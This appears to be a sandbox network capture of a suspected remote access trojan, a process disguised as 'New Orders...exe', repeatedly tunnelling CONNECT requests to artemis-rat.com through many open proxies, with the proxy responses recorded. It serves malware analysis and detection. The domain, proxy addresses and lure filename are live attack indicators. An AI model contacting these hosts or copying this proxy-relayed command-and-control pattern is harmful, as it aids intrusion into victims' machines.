                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        629192.168.2.95205343.157.47.74437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.286487103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        630192.168.2.95174445.71.184.13480807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.286539078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.980143070 CET19INHTTP/1.1 200 OK
                                                                                        Mar 11, 2024 16:17:46.116468906 CET208INHTTP/1.0 504 Gateway Timeout
                                                                                        Content-Length: 487
                                                                                        Content-Type: text/html
                                                                                        Date: Mon, 11 Mar 2024 15:17:45 GMT
                                                                                        Expires: Mon, 11 Mar 2024 15:17:45 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        631192.168.2.95180367.43.227.22724117672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.286570072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.599334002 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        632192.168.2.952083218.145.131.1824437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.287219048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        633192.168.2.95183367.43.228.25398277672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.287301064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.903207064 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        634192.168.2.951935104.17.50.45807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.288259983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.443483114 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        635192.168.2.950966103.49.114.19580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.288347006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        636192.168.2.951883148.72.23.5648337672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.290061951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.835520983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.664051056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.070238113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.773566008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.576360941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.273448944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.773370028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.476206064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        637192.168.2.951687176.99.2.4310817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.290452003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.651557922 CET228INHTTP/1.0 502 Bad Gateway
                                                                                        Connection: close
                                                                                        Content-type: text/html; charset=utf-8
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        638192.168.2.95213143.157.47.74437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.292166948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        639192.168.2.95183745.228.235.259997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.295733929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.945099115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.824146986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.324353933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.445405960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.524301052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.632869959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.632754087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:02.731858015 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        640192.168.2.951989104.25.194.175807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.296314001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.450550079 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        641192.168.2.9517094.144.161.159807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.297046900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        642192.168.2.95213243.157.47.74437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.297787905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        643192.168.2.952133218.145.131.1824437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.298033953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        644192.168.2.95189667.43.236.20317337672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.299635887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.128345013 CET28INHTTP/1.1 502 Bad Gateway


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        645192.168.2.952135218.145.131.1824437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.299843073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        646192.168.2.95168362.141.70.118807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.300442934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.671183109 CET529INHTTP/1.1 501 Not Implemented
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 357
                                                                                        Date: Mon, 11 Mar 2024 15:06:27 GMT
                                                                                        Server: lighttpd/1.4.28
                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 2d 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 35 30 31 20 2d 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>501 - Not Implemented</title> </head> <body> <h1>501 - Not Implemented</h1> </body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        647192.168.2.95167749.4.48.12888887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.301143885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.132641077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.660048008 CET59INHTTP/1.1 200 Connection Established
                                                                                        Proxy-agent: nginx


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        648192.168.2.952136218.145.131.1824437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.301208973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        649192.168.2.95213843.157.47.74437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.302751064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        650192.168.2.950990128.199.116.3444447672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.308665991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.476317883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.477691889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.570369959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        651192.168.2.95175285.62.218.25031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.314882994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.742357016 CET1254INHTTP/1.1 403 Forbidden
                                                                                        Server: squid/3.5.28
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 952
                                                                                        X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                        Content-Language: en
                                                                                        X-Cache: MISS from ah_test
                                                                                        Via: 1.1 ah_test (squid/3.5.28)
                                                                                        Connection: close
